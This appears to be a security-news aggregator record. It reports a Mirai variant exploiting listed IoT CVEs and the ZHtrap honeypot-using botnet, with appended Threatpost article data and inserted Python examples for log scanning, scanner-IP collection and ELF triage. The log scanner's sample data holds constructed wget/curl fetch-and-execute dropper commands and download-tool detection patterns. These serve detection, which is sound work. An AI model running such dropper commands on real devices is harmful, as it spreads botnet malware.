New Mirai Variant and ZHtrap Botnet Malware Emerge in the Wild
2021-03-16T10:32:00
ID THN:3907AE12F794F0523BEE196D6543A50F Type thn Reporter The Hacker News Modified 2021-03-18T03:14:02
Description
Cybersecurity researchers on Monday disclosed a new wave of ongoing attacks exploiting multiple vulnerabilities to deploy new Mirai variants on internet-connected devices.
"Upon successful exploitation, the attackers try to download a malicious shell script, which contains further infection behaviors such as downloading and executing Mirai variants and brute-forcers," Palo Alto Networks' Unit 42 Threat Intelligence Team said in a write-up.
The vulnerabilities being exploited include:
VisualDoor - a SonicWall SSL-VPN remote command injection vulnerability that came to light in January 2021
CVE-2020-25506 - a D-Link DNS-320 firewall remote code execution (RCE) vulnerability
CVE-2021-27561 and CVE-2021-27562 - two vulnerabilities in Yealink Device Management that allow an unauthenticated attacker to run arbitrary commands on the server with root privileges
CVE-2021-22502 - an RCE flaw in Micro Focus Operation Bridge Reporter (OBR), affecting version 10.40
CVE-2019-19356 - a Netis WF2419 wireless router RCE exploit, and
CVE-2020-26919 - a Netgear ProSAFE Plus RCE vulnerability
"The VisualDoor exploit in question targets an old SSL-VPN firmware vulnerability that was patched on legacy products in 2015 with 7.5.1.4-43sv and 8.0.0.4-25sv releases," SonicWall said in a statement to The Hacker News. "It is not viable against any properly patched SonicWall appliances."
Also in the mix are exploits for three previously undisclosed command injection vulnerabilities, deployed against as-yet-unidentified targets; one of them, according to the researchers, has been observed in conjunction with a separate botnet known as MooBot.
The attacks were observed over roughly a month, from February 16 through at least March 13, and were still ongoing at the time of the write-up.
Whichever flaw provides the initial foothold, the attack chain is the same: the exploit payload invokes the wget utility to download a shell script from the attackers' infrastructure, and that script then fetches and runs Mirai binaries. Mirai is the malware that turns Linux-based IoT devices into remotely controlled bots for large-scale network attacks such as DDoS.
Besides downloading Mirai, some of the shell scripts also retrieve executables that brute-force logins on other devices with weak passwords, giving the botnet a second propagation path alongside the exploits.
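The wget-then-execute sequence described above is recognisable in web-server or proxy logs before the dropper ever runs. The following added example (mine, not Unit 42's or The Hacker News' code) percent-decodes each request target and flags a download utility followed by an execute step; the log lines, addresses, script names and parameter names in it are constructed for illustration and are not indicators from the article.

```python
"""Flag Mirai-style 'fetch a script, then run it' payloads in HTTP logs.

Added example: this is not code from Unit 42 or The Hacker News, and the
log lines, IPs, file names and parameter names below are constructed for
illustration, not indicators from the article.
"""
import re
from urllib.parse import unquote_plus

# Combined-log-format request line; only the fields this check needs.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# The downloader the article's droppers used (wget) plus common stand-ins.
FETCH_RE = re.compile(r"\b(wget|curl|tftp|ftpget)\b", re.I)
# An execute step: chmod, or a shell invoked after a separator or via a pipe.
EXEC_RE = re.compile(r"(?:^|[;&|`\s(])(?:chmod\s+\S+|sh|bash|busybox\s+sh)\b", re.I)


def decode_target(target: str) -> str:
    """Percent-decode twice so a double-encoded payload is still readable."""
    return unquote_plus(unquote_plus(target))


def is_dropper(command: str) -> bool:
    """True when a fetch utility is followed (later in the string) by an execute step."""
    fetch = FETCH_RE.search(command)
    if fetch is None:
        return False
    return EXEC_RE.search(command, fetch.end()) is not None


def scan_log(text: str) -> list:
    """Return one finding per request whose decoded target looks like a dropper."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m is None:
            continue
        decoded = decode_target(m.group("target"))
        if is_dropper(decoded):
            findings.append({"ip": m.group("ip"), "ts": m.group("ts"),
                             "method": m.group("method"), "decoded": decoded})
    return findings


# Constructed sample lines (not real traffic): one benign page hit, one
# backtick-wrapped wget dropper, one double-encoded curl|sh dropper, and a
# benign query that merely mentions wget.
SAMPLE_LOG = """\
203.0.113.7 - - [16/Feb/2021:10:12:03 +0000] "GET /index.html HTTP/1.1" 200 1043
203.0.113.9 - - [16/Feb/2021:10:12:05 +0000] "POST /cgi-bin/login.cgi?key=%60cd%20%2Ftmp%3Bwget%20http%3A%2F%2F198.51.100.5%2Fx.sh%3Bchmod%20777%20x.sh%3Bsh%20x.sh%60 HTTP/1.1" 200 512
203.0.113.9 - - [16/Feb/2021:10:12:06 +0000] "GET /setup.cgi?cmd=%3Bcurl%2520http%3A%2F%2F198.51.100.5%2Fa.sh%257Csh HTTP/1.1" 404 0
198.51.100.44 - - [16/Feb/2021:10:13:00 +0000] "GET /search?q=how+to+use+wget HTTP/1.1" 200 2201
"""

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} {f['method']} -> {f['decoded']}")
```

The order check matters: a bare mention of wget in a search query is not a dropper, and neither is a download with no execution behind it, so the execute pattern is only searched after the fetch utility. Decoding twice catches the double-encoded variant that a single unquote would leave as opaque percent sequences.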
"The IoT realm remains an easily accessible target for attackers. Many vulnerabilities are very easy to exploit and could, in some cases, have catastrophic consequences," the researchers said.
New ZHtrap Botnet Traps Victims Using a Honeypot
In a related development, researchers from Chinese security firm Netlab 360 discovered a new Mirai-based botnet called ZHtrap that makes use of a honeypot to harvest additional victims, while borrowing some features from a DDoS botnet known as Matryosh.
Honeypots are normally a defender's tool: they mimic an attractive target so that intrusion attempts can be observed and the attackers' methods studied. ZHtrap turns the idea around, using an IP-collection module on the infected device to record the addresses of hosts that scan it and then feeding those addresses to its own worm-like propagation.
It does this by listening on 23 designated ports and recording the IP address of every host that connects to any of them, then checking the collected addresses for four vulnerabilities through which it injects its payload:
MVPower DVR Shell unauthenticated RCE
Netgear DGN1000 Setup.cgi unauthenticated RCE
CCTV DVR RCE affecting multiple vendors, and
Realtek SDK miniigd SOAP command execution (CVE-2014-8361)
"ZHtrap's propagation uses four N-day vulnerabilities, the main function is DDoS and scanning, while integrating some backdoor features," the researchers said. "Zhtrap sets up a honeypot on the infected device, [and] takes snapshots for the victim devices, and disables the running of new commands based on the snapshot, thus achieving exclusivity over the device."
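The IP-harvesting module at the core of ZHtrap is the same thing a defender's low-interaction honeypot does: bind some ports, accept whatever connects, record the source address and give nothing back. The following added example (mine, not Netlab 360's analysis code or anything from ZHtrap) shows that collector in Python; it binds two OS-chosen loopback ports rather than ZHtrap's 23, and the port list, class and function names are assumptions of the example.

```python
"""Collect the source addresses of hosts that probe a set of listening ports.

Added example, not code from Netlab 360 or from ZHtrap itself: it is the
plain honeypot-style collector a defender would run to harvest scanner IPs,
which is the mechanism the article says ZHtrap repurposes to pick targets.
The port list (0 = OS-chosen) is an assumption, not the 23 ports ZHtrap uses.
"""
import socket
import threading
import time
from collections import Counter


class ScannerTrap:
    """Listen on several TCP ports; record who connects, answer nothing."""

    def __init__(self, host="127.0.0.1"):
        self.host = host
        self.hits = Counter()          # source IP -> number of connections seen
        self._lock = threading.Lock()
        self._servers = []
        self._threads = []
        self._stop = threading.Event()

    def start(self, ports):
        """Bind each port (0 lets the OS pick) and return the bound port numbers."""
        bound = []
        for port in ports:
            srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            srv.bind((self.host, port))
            srv.listen(16)
            srv.settimeout(0.2)        # short timeout so the accept loop notices stop()
            self._servers.append(srv)
            bound.append(srv.getsockname()[1])
            t = threading.Thread(target=self._serve, args=(srv,), daemon=True)
            t.start()
            self._threads.append(t)
        return bound

    def _serve(self, srv):
        while not self._stop.is_set():
            try:
                conn, (ip, _port) = srv.accept()
            except socket.timeout:
                continue
            except OSError:
                break
            with self._lock:
                self.hits[ip] += 1
            conn.close()               # no banner: the scanner learns nothing back

    def targets(self, min_hits=1):
        """IPs seen at least min_hits times, most active first."""
        with self._lock:
            return [ip for ip, n in self.hits.most_common() if n >= min_hits]

    def stop(self):
        self._stop.set()
        for t in self._threads:
            t.join(timeout=1)
        for srv in self._servers:
            srv.close()


def probe(host, port):
    """Behave like a scanner: open a connection and drop it immediately."""
    with socket.create_connection((host, port), timeout=2):
        pass


def demo():
    """Start a trap on two ephemeral loopback ports, probe them, return what it saw."""
    trap = ScannerTrap()
    ports = trap.start([0, 0])
    for p in ports:
        probe("127.0.0.1", p)
    for _ in range(50):                # give the accept threads a moment to record
        if trap.hits["127.0.0.1"] >= len(ports):
            break
        time.sleep(0.05)
    seen = trap.targets()
    trap.stop()
    return ports, seen, dict(trap.hits)


if __name__ == "__main__":
    print(demo())
```

Run on a real host, the same listener doubles as a tripwire for ZHtrap's own propagation: any source that probes ports it has no business touching is a scanner, and a device that suddenly starts listening on two dozen new ports is a candidate victim.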
Once it has taken over the devices, ZHtrap takes a cue from the Matryosh botnet by using Tor for communications with a command-and-control server to download and execute additional payloads.
The researchers, who noted that the attacks began on February 28, 2021, described ZHtrap's ability to turn infected devices into honeypots as an "interesting" evolution of botnet technique for finding more targets.
These Mirai-based botnets are the latest to appear on the threat landscape, fuelled in part by the public availability of Mirai's source code since 2016, which has left the field open for other attackers to build their own variants.
Last March, researchers discovered a Mirai variant called "Mukashi," which was found targeting Zyxel network-attached storage (NAS) devices to conscript them into a botnet. Then in October 2020, Avira's IoT research team identified another variant of the Mirai botnet named "Katana," which exploited remote code execution vulnerabilities to infect D-Link DSL-7740C routers, DOCSIS 3.1 wireless gateway devices, and Dell PowerConnect 6224 Switches.
{"threatpost": [{"lastseen": "2021-03-17T20:47:24", "bulletinFamily": "info", "cvelist": ["CVE-2019-19356", "CVE-2020-25506", "CVE-2020-26919", "CVE-2021-22502", "CVE-2021-27561", "CVE-2021-27562"], "description": "A new variant of the Mirai botnet has been discovered targeting a slew of vulnerabilities in unpatched D-Link, Netgear and SonicWall devices \u2014 as well as never-before-seen flaws in unknown internet-of-things (IoT) gadgets.\n\nSince Feb. 16, the new variant has been targeting six known vulnerabilities \u2013 and three previously unknown ones \u2013 in order to infect systems and add them to a botnet. It\u2019s only the latest variant of Mirai [to come to light](<https://threatpost.com/new-mirai-variant-mukashi-targets-zyxel-nas-devices/153982/>), years after source code for the malware [was released](<https://threatpost.com/source-code-released-for-mirai-ddos-malware/121039/>) in October 2016.\n\n\u201cThe attacks are still ongoing at the time of this writing,\u201d said researchers with Palo Alto Networks\u2019 Unit 42 team [on Monday](<https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/>). \u201cUpon successful exploitation, the attackers try to download a malicious shell script, which contains further infection behaviors such as downloading and executing Mirai variants and brute-forcers.\u201d\n\n## **Initial Exploit: New and Old Flaws**\n\nThe attacks leverage a number of vulnerabilities. 
The known vulnerabilities exploited include: A SonicWall SSL-VPN exploit; a D-Link DNS-320 firewall exploit ([CVE-2020-25506](<https://nvd.nist.gov/vuln/detail/CVE-2020-25506>)); Yealink Device Management remote code-execution (RCE) flaws ([CVE-2021-27561 and CVE-2021-27562](<https://ssd-disclosure.com/ssd-advisory-yealink-dm-pre-auth-root-level-rce/>)); a Netgear ProSAFE Plus RCE flaw ([CVE-2020-26919](<https://nvd.nist.gov/vuln/detail/CVE-2020-26919>)); an RCE flaw in Micro Focus Operation Bridge Reporter ([CVE-2021-22502](<https://github.com/pedrib/PoC/blob/master/advisories/Micro_Focus/Micro_Focus_OBR.md>)); and a Netis WF2419 wireless router exploit ([CVE-2019-19356](<https://nvd.nist.gov/vuln/detail/CVE-2019-19356>) ).\n\nPatches are available for all of these flaws; the botnet is targeting devices that have not yet applied the available updates.\n\nFor instance, \u201cthe VisualDoor exploit in question targets an old SSL-VPN firmware vulnerability that was patched on legacy products in 2015 with 7.5.1.4-43sv and 8.0.0.4-25sv releases,\u201d a SonicWall spokesperson told Threatpost. \u201cIt is not viable against any properly patched SonicWall appliances.\u201d\n\nThe botnet also exploited vulnerabilities that were not previously identified. Researchers believe that these flaws exist in IoT devices.\n\n\u201cWe cannot say with certainty what the targeted devices are for the unidentified exploits,\u201d Zhibin Zhang, principal researcher for Unit 42, told Threatpost. \u201cHowever, based off of the other known exploits in the samples, as well as the nature of exploits historically selected to be incorporated with Mirai, it is highly probable they target IoT devices.\u201d\n\nThe exploits themselves include two RCE attacks \u2014 including an exploit targeting a command-injection vulnerability in certain components; and an exploit targeting the Common Gateway Interface (CGI) login script (stemming from a key parameter not being properly sanitized). 
The third exploit targets the op_type parameter, which is not properly sanitized leading to a command injection, said researchers.\n\nThe latter has \u201cbeen observed in the past being [used by [the] Moobot [botnet]](<https://threatpost.com/mootbot-fiber-routers-zero-days/154962/>), however the exact target is unknown,\u201d researchers noted. Threatpost has reached out to researchers for further information on these unknown targets.\n\n## **Mirai Botnet: A Set of Binaries**\n\nAfter initial exploitation, the malware invokes the wget utility (a legitimate program that retrieves content from web servers) in order to download a shell script from the malware\u2019s infrastructure. The shell script then downloads several Mirai binaries and executes them, one-by-one.\n\nOne such binary includes lolol.sh, which has multiple functions. Lolol.sh deletes key folders from the target machine (including ones with existing scheduled jobs and startup scripts); creates packet filter rules to bar incoming traffic directed at the commonly-used SSH, HTTP and telnet ports (to make remote access to the affected system more challenging for admins); and schedules a job that aims to rerun the lolol.sh script every hour (for persistence). Of note, this latter process is flawed, said researchers, as the cron configuration is incorrect.\n\nAnother binary (install.sh) downloads various files and packages \u2013 including GoLang v1.9.4, the \u201cnbrute\u201d binaries (that [brute-force various credentials](<https://threatpost.com/millions-brute-force-attacks-rdp/155324/>)) and the combo.txt file (which contains numerous credential combinations, to be used for brute-forcing by \u201cnbrute\u201d).\n\nThe final binary is called dark.[arch], and is based on the Mirai codebase. 
This binary mainly functions for propagation, either via the various initial Mirai exploits described above, or via brute-forcing SSH connections using hardcoded credentials in the binary.\n\n## **Mirai Variants Continue to Pop Up**\n\nThe variant is only the latest to rely on Mirai\u2019s source code, [which has proliferated into more than 60 variants](<https://threatpost.com/mirai-botnet-sees-big-2019-growth-shifts-focus-to-enterprises/146547/>) since bursting on the scene with a massive distributed denial of service (DDoS) [takedown of DNS provider Dyn](<https://threatpost.com/dyn-confirms-ddos-attack-affecting-twitter-github-many-others/121438/>) in 2016.\n\nLast year, a Mirai variant was found [targeting Zyxel network-attached storage (NAS) devices](<https://threatpost.com/new-mirai-variant-mukashi-targets-zyxel-nas-devices/153982/>) using a critical vulnerability that was only recently discovered, according to security researchers. In 2019, [a variant of the botnet](<https://threatpost.com/mirai-enterprise-systems/142889/>) was found sniffing out and targeting vulnerabilities in enterprise wireless presentation and display systems. And, a 2018 variant [was used to launch a series of DDoS campaigns](<https://threatpost.com/mirai-variant-targets-financial-sector-with-iot-ddos-attacks/131056/>) against financial-sector businesses.\n\nResearchers said that the biggest takeaway here is that connected devices continue to pose a security problem for users. They strongly advised customers to apply patches whenever possible.\n\n\u201cThe IoT realm remains an easily accessible target for attackers,\u201d according to Unit 42\u2019s report. 
\u201cMany vulnerabilities are very easy to exploit and could, in some cases, have catastrophic consequences.\u201d\n\n**_Check out our free [upcoming live webinar events](<https://threatpost.com/category/webinars/>) \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community:_**\n\n * March 24: **Economics of 0-Day Disclosures: The Good, Bad and Ugly **([Learn more and register!](<https://threatpost.com/webinars/economics-of-0-day-disclosures-the-good-bad-and-ugly/>))\n * April 21: **Underground Markets: A Tour of the Dark Economy **([Learn more and register!](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/>))\n", "modified": "2021-03-16T16:57:46", "published": "2021-03-16T16:57:46", "id": "THREATPOST:3F4C590CA1F6027665DF96DF6D651032", "href": "https://threatpost.com/mirai-variant-sonicwall-d-link-iot/164811/", "type": "threatpost", "title": "Latest Mirai Variant Targets SonicWall, D-Link and IoT Devices", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T22:56:57", "bulletinFamily": "info", "cvelist": ["CVE-2014-8361"], "description": "A zero day vulnerability in popular household routers from D-Link and Trendnet could be exploited by attackers to run arbitrary code on devices.\n\nThe flaw, which can be exploited without authentication, is present in version 1.3 of Realtek\u2019s SDK, which figures into some brands of routers, according to by HP\u2019s Zero Day Initiative who disclosed the vulnerability last Friday.\n\n\u201cThe specific flaw exists within the miniigd SOAP service,\u201d reads the [advisory](<http://www.zerodayinitiative.com/advisories/ZDI-15-155/>), \u201cThe issue lies in the handling of the NewInternalClient requests due to a failure to sanitize user data before executing a service call. 
An attacker could leverage this vulnerability to execute code with root privileges.\u201d\n\nRicky \u201cHeadless Zeke\u201d Lawshae, a security researcher for DV Labs at HP\u2019s Tipping Point reported the vulnerability (CVE-2014-8361) to HP\u2019s ZDI in August 2014. Lawshae initially identified the vulnerabilities in routers from Trendnet and D-link, but acknowledged on Twitter [over the weekend](<https://twitter.com/HeadlessZeke/status/592125815183147008>) that anything using the miniigd binary from Realtek\u2019s SDK could be vulnerable.\n\n> Remember that 0day I mentioned a loooong time ago? The advisory just went up.\n> \n> \u2014 HeadlessZeke (@HeadlessZeke) [April 24, 2015](<https://twitter.com/HeadlessZeke/status/591714797395185664>)\n\n> Unauth remote root via the WAN port on a huge number of SOHO routers using the RealTek chipset SDK <http://t.co/tVWqJuvNl3>\n> \n> \u2014 HeadlessZeke (@HeadlessZeke) [April 24, 2015](<https://twitter.com/HeadlessZeke/status/591715502860304384>)\n\nZDI reached out to the vendor four times from August to October last year without hearing back and decided to go public with the vulnerability last week.\n\nTo mitigate the vulnerability, ZDI is instructing users to restrict Realtek SDK\u2019s interaction to trusted machines. Using either firewalls or whitelisting, users should only grant \u201cclients and servers that have a legitimate procedural relationship\u201d with the SDK the ability to access it.\n\nRouter companies have had an extraordinarily tough go of it on the security front this year. 
D-Link in particular has been forced to [patch a handful of vulnerabilities](<https://threatpost.com/d-link-working-on-firmware-updates-for-three-critical-bugs/111420>) in its home routers that gave attackers [root access and enabled DNS hijacking](<https://threatpost.com/d-link-routers-haunted-by-remote-command-injection-bug/111355>) throughout February and March.\n", "modified": "2015-05-06T17:15:08", "published": "2015-04-30T14:07:04", "id": "THREATPOST:B768158F88D25034EC975AA313B9339C", "href": "https://threatpost.com/unpatched-router-vulnerability-could-lead-to-code-execution/112524/", "type": "threatpost", "title": "Routers Vulnerable to Critical Remote Code Execution Vulnerability", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-23T05:27:58", "bulletinFamily": "info", "cvelist": ["CVE-2014-8361", "CVE-2017-17215"], "description": "Exploit code used in the Mirai malware variant called Satori, which was used to attack hundreds of thousands of Huawei routers over the[ past several weeks](<https://threatpost.com/huawei-router-vulnerability-used-to-spread-mirai-variant/129238/>), is now public. Researchers warn the code will quickly become a commodity and be leveraged in DDoS attacks via botnets such as Reaper or IOTrooper.\n\nAnkit Anubhav, researcher at NewSky Security first identified the code on Monday that was posted publicly on Pastebin.com. The code is the zero-day vulnerability CVE- 2017-17215 used by a hacker identified as \u201cNexus Zeta\u201d to spread a variant of the Mirai malware called Satori, also known as Mirai Okiru.\n\n\u201cThe fact that the code is now in the open means that more threat actors would now be using it. 
We can assume that the exploit would become commodity, and IoT botnets that attempt at exploiting a large kit of vulnerabilities will be adding CVE- 2017-17215 to their arsenal,\u201d said Maya Horowitz, threat intelligence group manager, Check Point.\n\n[Last week](<https://threatpost.com/huawei-router-vulnerability-used-to-spread-mirai-variant/129238/>), Check Point identified the vulnerability ([CVE-2017-17215](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17215>)) in a Huawei home router model HG532 that was being exploited by Nexus Zeta to spread the Mirai variant Mirai Okiru/Satori. Since then Huawei issued an updated [security notice](<http://www.huawei.com/en/psirt/security-notices/huawei-sn-20171130-01-hg532-en>) to customers warning the flaw allows a remote adversary to send malicious packets to port 37215 to execute remote code on vulnerable routers.\n\n\u201cThis code is now known to a variety of black hats. Just like previous SOAP exploits released for free to the public it will be used by various script kiddies and threat actors,\u201d Anubhav said. NewSky Security posted [a blog Thursday outlining its discovery](<https://blog.newskysecurity.com/huawei-router-exploit-involved-in-satori-and-brickerbot-given-away-for-free-on-christmas-by-ac52fe5e4516>) of the zero-day code.\n\nThe underlying cause was a bug related to SOAP, a protocol used by many IoT devices, Anubhav said. Earlier issues in SOAP (CVE-2014-8361 and TR-064 ) effected different vendors and was widely used by Mirai variants.\n\nIn the case of CVE-2017-17215, this zero day exploits how the Huawei router uses of the Universal Plug and Play (UPnP) protocol and the TR-064 technical report standard. TR-064 is a standard designed to make it easy to add embedded UPnP devices to a local network.\n\n\u201cIn this case though, the TR-064 implementation in the Huawei devices was exposed to WAN through port 37215 (UPnP),\u201d researchers wrote. 
The UPnP framework supports a \u201cDeviceUpgrade\u201d that can carry out a firmware upgrade action.\n\nThe vulnerability allows remote administrators to execute arbitrary commands by injecting shell meta-characters into the DeviceUpgrade process.\n\n\u201cAfter these have been executed, the exploit returns the default HUAWEIUPNP message, and the \u2018upgrade\u2019 is initiated,\u201d Check Point researchers wrote.\n\nThe payload\u2019s main purpose is to instruct the bot to flood targets with manually crafted UDP or TCP packets.\n\n\u201cThe exploit code was already used by two major IoT botnets, Brickerbot and Satori, and now that the code is public it will be incorporated into different botnet strains,\u201d Anubhav said.\n\nMitigation against attacks includes configuring a router\u2019s built-in firewall, changing the default password or using firewall at the carrier side, Huawei said.\n\n\u201cPlease note that users of this router are mostly home users, who do not typically log in to their router\u2019s interface and don\u2019t necessarily have the know-how, and so unfortunately I have to assume most devices would stay vulnerable,\u201d Horowitz said. 
\u201cWe desperately need IoT device manufacturers to make security a top priority and not to leave the users accountable.\u201d\n", "modified": "2017-12-28T14:01:00", "published": "2017-12-28T14:01:00", "id": "THREATPOST:58600E628B858CCDB55A42CF867B1CF7", "href": "https://threatpost.com/code-used-in-zero-day-huawei-router-attack-made-public/129260/", "type": "threatpost", "title": "Code Used in Zero Day Huawei Router Attack Made Public", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-03-08T12:00:30", "bulletinFamily": "info", "cvelist": ["CVE-2014-8361", "CVE-2017-17215"], "description": "New samples of the Mirai malware have been identified, targeting an array of embedded processors and architectures within connected devices.\n\nResearchers said that they discovered new Mirai samples in February 2019, capable of infecting IoT devices running Altera Nios II, OpenRISC, Tensilica Xtensa, and Xilinx MicroBlaze processors. Variants of Mirai have previously targeted CPU architectures like ARM and x86.\n\nWhile it\u2019s not the first time Mirai\u2019s targeting of new processor architectures has expanded \u2013 samples targeting Argonaut RISC Core (ARC) CPUs were discovered in [January 2018](<https://twitter.com/_odisseus/status/952643252116770817?ref_src=twsrc%5Etfw>) \u2013the development shows that Mirai developers continue to expand their targets to incorporate a growing array of IoT devices, researchers with Palo Alto Network\u2019s Unit 42 group said in a [Monday post](<https://unit42.paloaltonetworks.com/mirai-compiled-for-new-processor-surfaces/>).\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThe addition of these processors expands the pool of potential devices which can be compromised and used for malicious activity,\u201d Jen Miller-Osborn, deputy director of threat intelligence for Unit 42 at Palo Alto Networks, told Threatpost. 
\u201cWe can\u2019t confirm all devices which contain these processors or why the actors chose to compile for them.\u201d\n\nXilinx\u2019s MicroBlaze processor and Altera\u2019s Nios II processors are specifically designed for field programmable gate array (FPGA) integrated circuits. FPGAs, which allow users to program hardware circuits to optimize a chip for a particular workload, are used for IoT application application requirements due to their low power.\n\nThe Mirai samples also are capable of infecting Tensilica\u2019s Xtensa processors, which range from small low-power microcontrollers up to neural network processors; and OpenRISC project based-open source CPUs, several of which are also known to run on FPGAs.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/04/08160552/Mirai-Sample.png>)\n\nMirai Samples\n\n\u201cExpanding Mirai-like malware to new architectures will only cause further headaches for those responsible for mitigating botnet activity,\u201d Troy Mursch, owner of Bad Packets Report, told Threatpost. \u201cGiven that the source code for Mirai has been open source for years now, this was inevitable. As for the impact of this \u2018expansion\u2019 we\u2019ll have to wait and see. DDoS attacks from Mirai-like botnets continue to plague the internet with some recently reaching nearly 40 Gbps in size.\u201d\n\nThe latest samples were discovered being hosted in an open directory on a single IP. The samples contained exploits that were known to be used in previous versions of Mirai.\n\nThat includes an exploit for a ThinkPHP remote code execution flaw, a D-Link DSL2750B OS command infection and a Netgear remote code execution glitch. 
Also included were exploits for CVE-2014-8361 (an arbitrary code execution flaw in Realtek SDK) and CVE-2017-17215 (a remote code execution flaw in Huawei HG532 routers).\n\n\u201cThe presence of these exploits in both previous versions of Mirai and our newly discovered samples helps show the tie between the two; they are likely used by the same attacker in this case,\u201d researchers said.\n\nMursch said he has also seen the same exploit attempts targeting the vulnerabilities listed.\n\n\u201cThis is because the targeted devices do not get patched and become re-infected by Mirai-like malware over and over,\u201d he said. \u201cCVE-2017-17215 is notable as it was used by the [Satori botnet](<https://threatpost.com/satori-author-linked-to-new-mirai-variant-masuta/129640/>) and infected hundreds of thousands of Huawei devices. The author of that botnet is now under indictment by the FBI.\u201d\n\nOn Feb. 22, the server was updated to hide the file listing, researchers said. A full list of Indicators of Compromise (IoCs) is available on their [blog post](<https://unit42.paloaltonetworks.com/mirai-compiled-for-new-processor-surfaces/>).\n\nMirai is best known for being used in a massive, unprecedented DDoS attack that compromised more than 300,000 IoT devices to take down major websites [in 2016](<https://threatpost.com/a-mirai-botnet-postscript-lessons-learned/130529/>).\n\nVariants of Mirai continue to pop up as cybercriminals tap into a growing number of vulnerable Internet of Things devices. 
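The Unit 42 finding above is that a single open directory hosted Mirai builds for several processor families. The script below is an added example, not Unit 42's code: it reads the ELF header of each payload and reports the target architecture, word size and endianness, which is how a responder sorts such a directory listing before choosing samples for deeper analysis. The sample blobs are constructed minimal ELF headers (not real malware) and the file names are assumed.

```python
"""Triage ELF payloads by target CPU architecture.

Added example (not Unit 42 code). Mirai-family droppers host one binary per
architecture; the first 20 bytes of each ELF header say which CPU it targets.
"""
import struct

# e_machine values from the ELF specification (glibc elf.h names in comments).
E_MACHINE = {
    2: "SPARC",                 # EM_SPARC
    3: "x86",                   # EM_386
    4: "m68k",                  # EM_68K
    8: "MIPS",                  # EM_MIPS
    20: "PowerPC",              # EM_PPC
    40: "ARM",                  # EM_ARM
    42: "SuperH",               # EM_SH
    45: "ARC",                  # EM_ARC
    62: "x86-64",               # EM_X86_64
    92: "OpenRISC",             # EM_OPENRISC
    93: "ARC (ARCompact)",      # EM_ARC_COMPACT
    94: "Xtensa",               # EM_XTENSA
    113: "Altera Nios II",      # EM_ALTERA_NIOS2
    183: "AArch64",             # EM_AARCH64
    189: "Xilinx MicroBlaze",   # EM_MICROBLAZE
}
E_TYPE = {1: "REL", 2: "EXEC", 3: "DYN", 4: "CORE"}


def parse_elf_header(data: bytes) -> dict:
    """Return class, endianness, type and machine for an ELF blob, or raise ValueError."""
    if len(data) < 20 or data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    ei_class, ei_data = data[4], data[5]          # EI_CLASS, EI_DATA
    if ei_class not in (1, 2) or ei_data not in (1, 2):
        raise ValueError("malformed ELF identification bytes")
    endian = "<" if ei_data == 1 else ">"
    e_type, e_machine = struct.unpack(endian + "HH", data[16:20])
    return {
        "bits": 32 if ei_class == 1 else 64,
        "endian": "little" if ei_data == 1 else "big",
        "type": E_TYPE.get(e_type, f"unknown({e_type})"),
        "machine": E_MACHINE.get(e_machine, f"unknown({e_machine})"),
        "e_machine": e_machine,
    }


def triage_samples(samples: dict) -> dict:
    """Map sample name -> one-line architecture summary; non-ELF files are skipped."""
    summary = {}
    for name, blob in samples.items():
        try:
            h = parse_elf_header(blob)
        except ValueError as exc:
            summary[name] = f"skipped: {exc}"
            continue
        summary[name] = f"{h['machine']} {h['bits']}-bit {h['endian']}-endian {h['type']}"
    return summary


def fake_elf(ei_class: int, ei_data: int, e_type: int, e_machine: int) -> bytes:
    """Build a minimal 20-byte ELF header for the demo (constructed, not a real sample)."""
    endian = "<" if ei_data == 1 else ">"
    ident = b"\x7fELF" + bytes([ei_class, ei_data, 1]) + b"\x00" * 9   # 16-byte e_ident
    return ident + struct.pack(endian + "HH", e_type, e_machine)


# Constructed stand-ins with assumed names; only the headers are meaningful.
SAMPLES = {
    "mirai.arm7": fake_elf(1, 1, 2, 40),
    "mirai.mips": fake_elf(1, 2, 2, 8),
    "mirai.xtensa": fake_elf(1, 1, 2, 94),
    "mirai.mb": fake_elf(1, 2, 2, 189),
    "mirai.nios2": fake_elf(1, 1, 2, 113),
    "mirai.or1k": fake_elf(1, 2, 2, 92),
    "x.sh": b"#!/bin/sh\ncd /tmp\n",
}

if __name__ == "__main__":
    for name, line in triage_samples(SAMPLES).items():
        print(f"{name:14s} {line}")
```

Run against a real directory by replacing `SAMPLES` with `{p.name: p.read_bytes()[:20] for p in Path(d).iterdir()}`; only the header is needed, so the binaries never have to be loaded in full.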
In September, researchers [discovered](<https://threatpost.com/mirai-gafgyt-botnets-return-to-target-infamous-apache-struts-sonicwall-flaws/137309/>) new variants for the infamous Mirai and Gafgyt IoT botnets targeting well-known vulnerabilities in Apache Struts and SonicWall; and in March researchers said that [a new Mirai variant](<https://threatpost.com/mirai-enterprise-systems/142889/>) was targeting TV and presentation systems used by enterprises.\n\n_**Don\u2019t miss our free**_**_ _**[_**Threatpost webinar**_](<https://attendee.gotowebinar.com/register/8845482382938181378?source=ART>)_**, \u201cData Security in the Cloud,\u201d on April 24 at 2 p.m. ET.**_\n\n_**A panel of experts will join Threatpost senior editor Tara Seals to discuss**_**_ _**_**how to lock down data when the traditional network perimeter is no longer in place. They will discuss how the adoption of cloud services presents new security challenges, including ideas and best practices for locking down this new architecture; whether managed or in-house security is the way to go; and ancillary dimensions, like SD-WAN and IaaS.**_\n", "modified": "2019-04-08T20:40:56", "published": 